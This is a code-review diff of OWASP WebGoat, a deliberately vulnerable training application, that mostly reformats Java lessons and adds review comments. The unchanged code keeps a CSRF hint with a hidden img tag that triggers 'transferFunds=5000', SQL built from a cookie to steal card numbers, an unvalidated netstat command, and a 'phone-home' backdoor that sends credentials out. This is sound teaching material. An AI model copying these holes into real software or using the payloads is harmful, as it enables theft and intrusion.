+ row3.addElement(new TD(new StringElement(results.getString(USER_COL))));
+ t.addElement(row3);
+
+ ec.addElement(t);
- String messageData = results.getString( MESSAGE_COL );
- TR row2 = new TR( new TD( new B(new StringElement( "Message:" )) ) );
- row2.addElement( new TD( new StringElement( messageData ) ) );
- t.addElement( row2 );
-
- TR row3 = new TR( new TD( new StringElement( "Posted By:" ) ) );
- row3.addElement( new TD( new StringElement( results.getString( USER_COL ) ) ) 
);
- t.addElement( row3 );
-
- ec.addElement( t );
-
 } else {
- if ( messageNum != 0 )
+ if (messageNum != 0)
 {
- ec.addElement( new P().addElement( "Could not find message " + messageNum ) );
+ ec.addElement(new P().addElement("Could not find message " + messageNum));
 }
 }
- }
- catch ( Exception e )
+ } catch (Exception e)
 {
- s.setMessage( "Error generating " + this.getClass().getName() );
+ s.setMessage("Error generating " + this.getClass().getName());
 e.printStackTrace();
 }
- return ( ec );
+ return (ec);
 }
- @Override
- protected Category getDefaultCategory() {
+ @Override
+ protected Category getDefaultCategory()
+ {
 return Category.XSS;
 }
 private final static Integer DEFAULT_RANKING = new Integer(120);
-
+
 @Override
- protected Integer getDefaultRanking() {
-
+ protected Integer getDefaultRanking()
+ {
+
 return DEFAULT_RANKING;
 }
- @Override
- protected List getHints(WebSession s) {
+ @Override
+ protected List getHints(WebSession s)
+ {
 List hints = new ArrayList();
- hints.add( "Enter some text and try to include an image in there." );
- hints.add( "In order to make the picture almost invisible try to add width=\"1\" and height=\"1\"." );
- hints.add( "The format of an image in html is
<img src=\"[URL]\" width=\"1\" height=\"1\" />
");
- hints.add( "Include this URL in the message
<img src='" + getLink() +
-			        "&transferFunds=5000' width=\"1\" height=\"1\" />
");
-
+ hints.add("Enter some text and try to include an image in there.");
+ hints.add("In order to make the picture almost invisible try to add width=\"1\" and height=\"1\".");
+ hints.add("The format of an image in html is
<img src=\"[URL]\" width=\"1\" height=\"1\" />
");
+ hints.add("Include this URL in the message
<img src='" + getLink()
+				+ "&transferFunds=5000' width=\"1\" height=\"1\" />
");
+
 return hints;
 }
 /**
- * Gets the title attribute of the MessageBoardScreen object
- *
- * @return The title value
+ * Gets the title attribute of the MessageBoardScreen object
+ *
+ * @return The title value
 */
 public String getTitle()
 {
- return ( "Cross Site Request Forgery (CSRF)" );
+ return ("Cross Site Request Forgery (CSRF)");
 }
- private static String getNameroot( String name )
+ private static String getNameroot(String name)
 {
 String nameroot = name;
- if (nameroot.indexOf('-') != -1)
+ if (nameroot.indexOf('-') != -1)
 {
- nameroot = nameroot.substring(0, nameroot.indexOf('-'));
+ nameroot = nameroot.substring(0, nameroot.indexOf('-'));
 }
 return nameroot;
 }
- public Element getCredits()
- {
- return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
- }
-
+ public Element getCredits()
+ {
+ return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
+ }
+
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/Category.java b/main/project/JavaSource/org/owasp/webgoat/lessons/Category.java
index f388b7472..e69fbcc90 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/Category.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/Category.java
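Review bot: `statement.execute();` in addMessage silently replaces the original `statement.executeUpdate();`, a behavioural change buried in an otherwise whitespace-only commit; for an INSERT the update-count form is the precise API and its result can be checked, so restore `statement.executeUpdate();` unless the switch was deliberate, in which case the commit message should say so. The same try block, and the ones in makeList and makeCurrent below it, never close the Statement/PreparedStatement they create (the Connection comes from DatabaseUtilities and may be shared, so that one is the helper's responsibility), so each request leaves a cursor open until the driver or GC reclaims it; close each statement in a `finally` block. makeList is also the only one of the three that builds its SQL by concatenation, `STANDARD_QUERY + " WHERE user_name LIKE '" + getNameroot(s.getUserName()) + "%'"`, while makeCurrent parameterises the same predicate with `LIKE ?`; the hints suggest this lesson's intended weakness is the unencoded message body rather than the query, so make makeList consistent: `PreparedStatement statement = connection.prepareStatement(STANDARD_QUERY + " WHERE user_name LIKE ?", ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); statement.setString(1, getNameroot(s.getUserName()) + "%"); ResultSet results = statement.executeQuery();`.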
@@ -1,35 +1,35 @@
+
 package org.owasp.webgoat.lessons;
 import java.util.ArrayList;
 import java.util.Iterator;
 import java.util.List;
-/*******************************************************************************
+
+/***************************************************************************************************
 *
 *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
 *
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
 *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
 *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
 *
 * Getting Source ==============
 *
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
 *
 * For details, please see http://code.google.com/p/webgoat/
 *
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java
index ae55a66a0..b95e024b2 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 import java.io.BufferedReader;
@@ -16,9 +17,7 @@ import java.util.ArrayList;
 import java.util.List;
 import java.util.StringTokenizer;
 import java.util.Vector;
-
 import javax.servlet.http.Cookie;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -39,32 +38,31 @@ import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.util.Exec;
 import org.owasp.webgoat.util.ExecResults;
-/*******************************************************************************
+
+/***************************************************************************************************
 *
 *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
 *
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
 *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
 *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
 *
 * Getting Source ==============
 *
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
 *
 * For details, please see http://code.google.com/p/webgoat/
 *
@@ -195,8 +193,7 @@ public class Challenge2Screen extends SequentialLessonAdapter
 s.getResponse().addCookie(newCookie);
 ElementContainer ec = new ElementContainer();
- if (s.getParser().getStringParameter(Input.SUBMIT, "")
- .equals(PROCEED_TO_NEXT_STAGE + "(3)"))
+ if (s.getParser().getStringParameter(Input.SUBMIT, "").equals(PROCEED_TO_NEXT_STAGE + "(3)"))
 {
 s.setMessage("Welcome to stage 3 -- deface the site");
 setStage(s, 3);
@@ -205,11 +202,11 @@ public class Challenge2Screen extends SequentialLessonAdapter
 return doStage3(s);
 }
- Connection connection = DatabaseUtilities.getConnection(s);
+ Connection connection = DatabaseUtilities.getConnection(s);
+
+ Statement statement3 = connection
+ .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
- Statement statement3 = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
- ResultSet.CONCUR_READ_ONLY);
-
 // pull the USER_COOKIE from the cookies
 String user = getCookie(s);
 String query = "SELECT * FROM user_data WHERE last_name = '" + user + "'";
@@ -225,48 +222,46 @@ public class Challenge2Screen extends SequentialLessonAdapter String num = results.getString("cc_number"); v.addElement(type + "-" + num); } - if (v.size() != 13) + if (v.size() != 13) { s.setMessage("Try to get all the credit card numbers"); - } - - ec.addElement(buildCart(s)); + } - Table t = new Table().setCellSpacing(0).setCellPadding(2) - .setBorder(0).setWidth("90%").setAlign("center"); + ec.addElement(buildCart(s)); - ec.addElement(new BR()); - TR tr = new TR(); - tr.addElement(new TD().addElement("Please select credit card for this purchase: ")); - Element p = ECSFactory.makePulldown(CREDIT, v); - tr.addElement(new TD().addElement(p).setAlign("right")); - t.addElement(tr); + Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); - tr = new TR(); - Element b = ECSFactory.makeButton("Buy Now!"); - tr.addElement(new TD().addElement(b)); - t.addElement(tr); - ec.addElement(t); + ec.addElement(new BR()); + TR tr = new TR(); + tr.addElement(new TD().addElement("Please select credit card for this purchase: ")); + Element p = ECSFactory.makePulldown(CREDIT, v); + tr.addElement(new TD().addElement(p).setAlign("right")); + t.addElement(tr); - ec.addElement(new BR()); - Input input = new Input(Input.HIDDEN, USER, "White"); - ec.addElement(input); - - //STAGE 3 BUTTON + tr = new TR(); + Element b = ECSFactory.makeButton("Buy Now!"); + tr.addElement(new TD().addElement(b)); + t.addElement(tr); + ec.addElement(t); + + ec.addElement(new BR()); + Input input = new Input(Input.HIDDEN, USER, "White"); + ec.addElement(input); + + // STAGE 3 BUTTON if (v.size() == 13) { s.setMessage("Congratulations! 
You stole all the credit cards, proceed to stage 3!"); ec.addElement(new BR()); - //TR inf = new TR(); + // TR inf = new TR(); Center center = new Center(); Element proceed = ECSFactory.makeButton(PROCEED_TO_NEXT_STAGE + "(3)"); center.addElement(proceed); - //inf.addElement(new TD().addElement(proceed).setAlign("center")); + // inf.addElement(new TD().addElement(proceed).setAlign("center")); ec.addElement(center); } - - } - catch (Exception e) + + } catch (Exception e) { s.setMessage("An error occurred in the woods"); } @@ -294,8 +289,7 @@ public class Challenge2Screen extends SequentialLessonAdapter // ElementContainer ec = new ElementContainer(); - if (s.getParser().getStringParameter(Input.SUBMIT, "") - .equals(PROCEED_TO_NEXT_STAGE + "(4)")) + if (s.getParser().getStringParameter(Input.SUBMIT, "").equals(PROCEED_TO_NEXT_STAGE + "(4)")) { setStage(s, 4); // Reset the defaced webpage so the lesson can start over @@ -309,22 +303,21 @@ public class Challenge2Screen extends SequentialLessonAdapter { ec.addElement(new HR()); s.setMessage("CONGRATULATIONS - You have defaced the site!"); - Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign( - "center"); + Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign("center"); if (s.isColor()) { t.setBorder(1); } TR tr = new TR(); - tr.addElement(new TD().setAlign("center").addElement( - ECSFactory.makeButton(PROCEED_TO_NEXT_STAGE + "(4)"))); + tr.addElement(new TD().setAlign("center").addElement(ECSFactory.makeButton(PROCEED_TO_NEXT_STAGE + "(4)"))); t.addElement(tr); tr = new TR(); tr.addElement(new TD().addElement(showDefaceAttempt(s))); t.addElement(tr); ec.addElement(t); return ec; - } else + } + else { // Setup the screen content try 
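Review bot: The `catch (Exception e) { s.setMessage("An error occurred in the woods"); }` closing this hunk discards the exception entirely, whereas every other catch block touched by this commit (the file checks, the restore, the phone-home) calls `e.printStackTrace()`; a SQL error raised by the cookie-driven query above is therefore undiagnosable from the server side. Add `e.printStackTrace();` (or the file's logging equivalent) before the user-facing message so the style is consistent and failures are visible. The magic `13` used twice for "all credit cards" would also read better as a named constant such as `EXPECTED_CARD_COUNT`, presumably the number of rows in `user_data`.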
@@ -332,8 +325,7 @@ public class Challenge2Screen extends SequentialLessonAdapter ec.addElement(new H1("Current Network Status:")); ec.addElement(netstatResults); - Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign( - "center"); + Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign("center"); if (s.isColor()) { t.setBorder(1); @@ -342,21 +334,17 @@ public class Challenge2Screen extends SequentialLessonAdapter TR tr = new TR(); tr.addElement(new TD().addElement(ECSFactory.makeButton("View Network"))); - tr.addElement(new TD().setWidth("35%").addElement( - ECSFactory.makePulldown(PROTOCOL, list, "", 5))); + tr.addElement(new TD().setWidth("35%").addElement(ECSFactory.makePulldown(PROTOCOL, list, "", 5))); t.addElement(tr); ec.addElement(t); - } - catch (Exception e) + } catch (Exception e) { - ec.addElement(new P() - .addElement("Select a message to read from the Message List below")); + ec.addElement(new P().addElement("Select a message to read from the Message List below")); } ec.addElement(new HR()); - Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign( - "center"); + Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign("center"); if (s.isColor()) { t.setBorder(1); 
@@ -377,15 +365,13 @@ public class Challenge2Screen extends SequentialLessonAdapter try { // get current text and compare to the new text - String origpath = s.getContext().getRealPath( - WEBGOAT_CHALLENGE + "_" + s.getUserName() + JSP); + String origpath = s.getContext().getRealPath(WEBGOAT_CHALLENGE + "_" + s.getUserName() + JSP); String masterFilePath = s.getContext().getRealPath(WEBGOAT_CHALLENGE_JSP); String defacedText = getFileText(new BufferedReader(new FileReader(origpath)), false); String origText = getFileText(new BufferedReader(new FileReader(masterFilePath)), false); defaced = (!origText.equals(defacedText)); - } - catch (Exception e) + } catch (Exception e) { e.printStackTrace(); } @@ -398,11 +384,10 @@ public class Challenge2Screen extends SequentialLessonAdapter ElementContainer ec = new ElementContainer(); // get current text and compare to the new text - String origpath = s.getContext().getRealPath( - WEBGOAT_CHALLENGE + "_" + s.getUserName() + JSP); + String origpath = s.getContext().getRealPath(WEBGOAT_CHALLENGE + "_" + s.getUserName() + JSP); String defaced = getFileText(new BufferedReader(new FileReader(origpath)), false); - String origText = getFileText(new BufferedReader(new FileReader(s.getContext().getRealPath( - WEBGOAT_CHALLENGE_JSP))), false); + String origText = getFileText(new BufferedReader(new FileReader(s.getContext() + .getRealPath(WEBGOAT_CHALLENGE_JSP))), false); // show webgoat.jsp text ec.addElement(new H1().addElement("Original Website Text")); @@ -420,8 +405,7 @@ public class Challenge2Screen extends SequentialLessonAdapter try { // get current text and compare to the new text - String defacedpath = s.getContext().getRealPath( - WEBGOAT_CHALLENGE + "_" + s.getUserName() + JSP); + String defacedpath = s.getContext().getRealPath(WEBGOAT_CHALLENGE + "_" + s.getUserName() + JSP); String masterFilePath = s.getContext().getRealPath(WEBGOAT_CHALLENGE_JSP); // replace the defaced text with the original 
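Review bot: The two `new BufferedReader(new FileReader(...))` objects in this hunk are passed to `getFileText` and never closed, and there is no `finally`, so unless `getFileText` closes the reader it is handed (not shown here) two file descriptors leak on every defacement check. Hold the readers in locals and close them in a `finally`, as sketched below (this needs `java.io.IOException` in scope, which the file may already import). Separately, `origpath` is built from `s.getUserName()`; if user names can contain path separators, `getRealPath` will resolve outside the intended JSP directory, so a comment stating where the name is validated — or a check that it is alphanumeric — would help. The enclosing method's signature and its `defaced` declaration are outside the hunk.

```java
// … unchanged: boolean defaced = false; (above the hunk) …
BufferedReader defacedReader = null;
BufferedReader masterReader = null;
try
{
    // … unchanged: origpath / masterFilePath construction …
    defacedReader = new BufferedReader(new FileReader(origpath));
    masterReader = new BufferedReader(new FileReader(masterFilePath));
    String defacedText = getFileText(defacedReader, false);
    String origText = getFileText(masterReader, false);
    defaced = (!origText.equals(defacedText));
} catch (Exception e)
{
    e.printStackTrace();
} finally
{
    // a close failure after the compare has completed is not worth reporting
    try { if (defacedReader != null) defacedReader.close(); } catch (IOException ignored) {}
    try { if (masterReader != null) masterReader.close(); } catch (IOException ignored) {}
}
```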
@@ -431,8 +415,7 @@ public class Challenge2Screen extends SequentialLessonAdapter fw.close(); // System.out.println("webgoat_guest replaced: " + getFileText( new // BufferedReader( new FileReader( defacedpath ) ), false ) ); - } - catch (Exception e) + } catch (Exception e) { e.printStackTrace(); } @@ -458,9 +441,8 @@ public class Challenge2Screen extends SequentialLessonAdapter ElementContainer ec = new ElementContainer(); ec.addElement(new H1().addElement("Thanks for coming!")); ec.addElement(new BR()); - ec - .addElement(new H1() - .addElement("Please remember that you will be caught and fired if you use these techniques for evil.")); + ec.addElement(new H1() + .addElement("Please remember that you will be caught and fired if you use these techniques for evil.")); return (ec); } @@ -525,8 +507,7 @@ public class Challenge2Screen extends SequentialLessonAdapter ElementContainer ec = new ElementContainer(); ec.addElement(new H1().addElement("Sign In ")); - Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%") - .setAlign("center"); + Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); if (s.isColor()) { @@ -534,11 +515,9 @@ public class Challenge2Screen extends SequentialLessonAdapter } TR tr = new TR(); - tr - .addElement(new TH() - .addElement( - "Please sign in to your account. See the OWASP admin if you do not have an account.") - .setColSpan(2).setAlign("left")); + tr.addElement(new TH() + .addElement("Please sign in to your account. See the OWASP admin if you do not have an account.") + .setColSpan(2).setAlign("left")); t.addElement(tr); tr = new TR(); 
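Review bot: `fw.close()` sits inside the `try` in this hunk, so if the preceding write throws, the `FileWriter` is never closed and the partially restored JSP stays open; move the close into a `finally` such as `} finally { if (fw != null) { try { fw.close(); } catch (IOException ignored) {} } }`. The `FileWriter` is declared above the hunk, so it may need to be hoisted out of the `try` for the `finally` to see it. The commented-out `System.out.println` debugging line left in the context could simply be deleted.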
@@ -594,9 +573,9 @@ public class Challenge2Screen extends SequentialLessonAdapter } /** - * This is a deliberate 'backdoor' that would send user name and password - * back to the remote host. Obviously, sending the password back to the - * remote host isn't that useful but... you get the idea + * This is a deliberate 'backdoor' that would send user name and password back to the remote + * host. Obviously, sending the password back to the remote host isn't that useful but... you + * get the idea * * @param s * Description of the Parameter @@ -614,8 +593,7 @@ public class Challenge2Screen extends SequentialLessonAdapter System.out.println(" Sending message to " + sock.getInetAddress()); sock.send(dp); sock.close(); - } - catch (Exception e) + } catch (Exception e) { System.out.println("Couldn't phone home"); e.printStackTrace(); @@ -645,8 +623,7 @@ public class Challenge2Screen extends SequentialLessonAdapter ElementContainer ec = new ElementContainer(); - Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%") - .setAlign("center"); + Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center"); if (s.isColor()) { @@ -668,7 +645,8 @@ public class Challenge2Screen extends SequentialLessonAdapter { String cmd = "cmd.exe /c netstat -a -p " + protocol; er = Exec.execSimple(cmd); - } else + } + else { String[] cmd = { "/bin/sh", "-c", "netstat -a -p " + protocol }; er = Exec.execSimple(cmd); @@ -684,7 +662,8 @@ public class Challenge2Screen extends SequentialLessonAdapter if ((line.indexOf("Proto") != -1)) { start++; - } else + } + else { line = lines.nextToken(); } @@ -740,8 +719,7 @@ public class Challenge2Screen extends SequentialLessonAdapter { OutputStreamWriter osw = new OutputStreamWriter(s.getOutputStream()); osw.write(message); - } - catch (Exception e) + } catch (Exception e) { System.out.println("Couldn't write " + message + " to " + s); e.printStackTrace(); 
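Review bot: In the `netstat` hunk (`@@ -668`) both branches hand `protocol` to a shell unvalidated: the Unix side's `String[]` form is no safer than the Windows string, because `"/bin/sh", "-c", "netstat -a -p " + protocol` still passes the concatenated text to the shell for parsing. If `protocol` comes from the PROTOCOL pulldown request parameter shown in an earlier hunk (the method signature is outside this hunk, so I am inferring), this is a command-injection point; that may well be the intended stage-3 vector, in which case mark it the way the phone-home code is marked, e.g. `// DELIBERATE: protocol is passed to the shell unvalidated -- intended command-injection point for the deface stage`. If it is not intended, whitelist `protocol` against the pulldown's values before building the command.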
@@ -754,8 +732,7 @@ public class Challenge2Screen extends SequentialLessonAdapter ec.addElement(new HR().setWidth("90%")); ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart "))); - Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%") - .setAlign("center"); + Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center"); if (s.isColor()) { @@ -778,8 +755,7 @@ public class Challenge2Screen extends SequentialLessonAdapter ec.addElement(t); - t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign( - "center"); + t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); if (s.isColor()) { @@ -815,10 +791,7 @@ public class Challenge2Screen extends SequentialLessonAdapter for (int i = 0; i < cookies.length; i++) { - if (cookies[i].getName().equalsIgnoreCase(USER_COOKIE)) - { - return (cookies[i].getValue()); - } + if (cookies[i].getName().equalsIgnoreCase(USER_COOKIE)) { return (cookies[i].getValue()); } } return (null); diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java index 6a0f37b3a..153e66f24 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons.ClientSideFiltering; import java.io.BufferedReader; @@ -6,7 +7,6 @@ import java.io.FileReader; import java.io.IOException; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.html.A; 
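Review bot: The new side of the `getCookie` hunk (`@@ -815`) collapses the loop body to one line, `if (cookies[i].getName().equalsIgnoreCase(USER_COOKIE)) { return (cookies[i].getValue()); }`, which contradicts the brace-on-its-own-line layout this same commit applies everywhere else (`}` / `else` split, `try` / `{` split); keep the braces on their own lines for consistency. Also worth a comment here: the value returned is the raw cookie text that an earlier hunk concatenates straight into SQL, so `// returns the raw USER_COOKIE value; callers treat it as untrusted` would tell a reader why no decoding or validation happens.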
@@ -28,26 +28,30 @@ import org.owasp.webgoat.lessons.SequentialLessonAdapter; import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.WebSession; -public class ClientSideFiltering extends SequentialLessonAdapter { + +public class ClientSideFiltering extends SequentialLessonAdapter +{ private final static String ANSWER = "answer"; - public final static A ASPECT_LOGO = new A().setHref( - "http://www.aspectsecurity.com").addElement( - new IMG("images/logos/aspect.jpg").setAlt("Aspect Security") - .setBorder(0).setHspace(0).setVspace(0)); + public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") + .addElement( + new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) + .setVspace(0)); - protected Element createContent(WebSession s) { + protected Element createContent(WebSession s) + { return super.createStagedContent(s); } - protected Element createMainContent(WebSession s) { + protected Element createMainContent(WebSession s) + { ElementContainer ec = new ElementContainer(); - try { + try + { - ec.addElement(new Script() - .setSrc("javascript/clientSideFiltering.js")); + ec.addElement(new Script().setSrc("javascript/clientSideFiltering.js")); Input input = new Input(Input.HIDDEN, "userID", 102); 
@@ -56,12 +60,11 @@ public class ClientSideFiltering extends SequentialLessonAdapter { ec.addElement(input); style sty = new style(); - sty - .addElement("#lesson_wrapper {height: 435px;width: 500px;}" - + "#lesson_header {background-image: url(lessons/Ajax/images/lesson1_header.jpg);" - + "width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}" - + ".lesson_workspace {background-image: url(lessons/Ajax/images/lesson1_workspace.jpg);" - + "width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}"); + sty.addElement("#lesson_wrapper {height: 435px;width: 500px;}" + + "#lesson_header {background-image: url(lessons/Ajax/images/lesson1_header.jpg);" + + "width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}" + + ".lesson_workspace {background-image: url(lessons/Ajax/images/lesson1_workspace.jpg);" + + "width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}"); ec.addElement(sty); @@ -82,23 +85,20 @@ public class ClientSideFiltering extends SequentialLessonAdapter { workspaceDiv.addElement(new BR()); workspaceDiv.addElement(new BR()); - workspaceDiv.addElement(new P() - .addElement("     Select user:")); + workspaceDiv.addElement(new P().addElement("     Select user:")); workspaceDiv.addElement(createDropDown()); workspaceDiv.addElement(new P()); - Table t = new Table().setCellSpacing(0).setCellPadding(2) - .setBorder(1).setWidth("90%").setAlign("center"); + Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center"); t.setID("hiddenEmployeeRecords"); t.setStyle("display: none"); workspaceDiv.addElement(t); - t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1) - .setWidth("90%").setAlign("center"); + t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center"); TR tr = new TR(); tr.addElement(new TD().addElement("UserID")); 
@@ -113,7 +113,8 @@ public class ClientSideFiltering extends SequentialLessonAdapter { workspaceDiv.addElement(t); - } catch (Exception e) { + } catch (Exception e) + { s.setMessage("Error generating " + this.getClass().getName()); e.printStackTrace(); } @@ -127,29 +128,34 @@ public class ClientSideFiltering extends SequentialLessonAdapter { * @return The category value */ - protected ElementContainer doStage1(WebSession s) { + protected ElementContainer doStage1(WebSession s) + { ElementContainer ec = new ElementContainer(); StringBuffer answerString = null; int answer = 0; - try { - answerString = new StringBuffer(s.getParser().getStringParameter( - ANSWER, "")); + try + { + answerString = new StringBuffer(s.getParser().getStringParameter(ANSWER, "")); answer = Integer.parseInt(answerString.toString()); - } catch (NumberFormatException e) { + } catch (NumberFormatException e) + { // e.printStackTrace(); } - if (answer == 450000) { + if (answer == 450000) + { getLessonTracker(s).setStage(2); s.setMessage("Stage 1 completed."); // Redirect user to Stage2 content. ec.addElement(doStage2(s)); - } else { + } + else + { ec.addElement(stage1Content(s)); } @@ -157,7 +163,8 @@ public class ClientSideFiltering extends SequentialLessonAdapter { } - protected Element doStage2(WebSession s) { + protected Element doStage2(WebSession s) + { ElementContainer ec = new ElementContainer(); /** 
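Review bot: In `doStage1` (`@@ -127` hunk) `answerString` is a `StringBuffer` built only to be converted back with `toString()` for `parseInt`, so the two lines can be `answer = Integer.parseInt(s.getParser().getStringParameter(ANSWER, ""));` with `answerString` removed. The empty `catch (NumberFormatException e)` with the commented-out `printStackTrace` looks intentional (a non-numeric answer just stays on stage 1), so name it `ignored` and say so: `catch (NumberFormatException ignored) { // non-numeric answer: fall through and re-show stage 1 }`.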
@@ -168,31 +175,36 @@ public class ClientSideFiltering extends SequentialLessonAdapter { String file = s.getWebResource("lessons/Ajax/clientSideFiltering.jsp"); String content = getFileContent(file); - if (content.indexOf("[Managers/Manager/text()") != -1) { + if (content.indexOf("[Managers/Manager/text()") != -1) + { makeSuccess(s); ec.addElement(stage2Content(s)); - } else { + } + else + { ec.addElement(stage2Content(s)); } return ec; } - protected ElementContainer stage1Content(WebSession s) { + protected ElementContainer stage1Content(WebSession s) + { ElementContainer ec = new ElementContainer(); - try { + try + { ec.addElement(createMainContent(s)); Table t1 = new Table().setCellSpacing(0).setCellPadding(2); - if (s.isColor()) { + if (s.isColor()) + { t1.setBorder(1); } TR tr = new TR(); - tr.addElement(new TD() - .addElement("What is Neville Bartholomew's salary? ")); + tr.addElement(new TD().addElement("What is Neville Bartholomew's salary? ")); tr.addElement(new TD(new Input(Input.TEXT, ANSWER, ""))); Element b = ECSFactory.makeButton("Submit Answer"); tr.addElement(new TD(b).setAlign("LEFT")); @@ -200,7 +212,8 @@ public class ClientSideFiltering extends SequentialLessonAdapter { ec.addElement(t1); - } catch (Exception e) { + } catch (Exception e) + { s.setMessage("Error generating " + this.getClass().getName()); e.printStackTrace(); } @@ -208,9 +221,11 @@ public class ClientSideFiltering extends SequentialLessonAdapter { return ec; } - protected ElementContainer stage2Content(WebSession s) { + protected ElementContainer stage2Content(WebSession s) + { ElementContainer ec = new ElementContainer(); - try { + try + { ec.addElement(createMainContent(s)); 
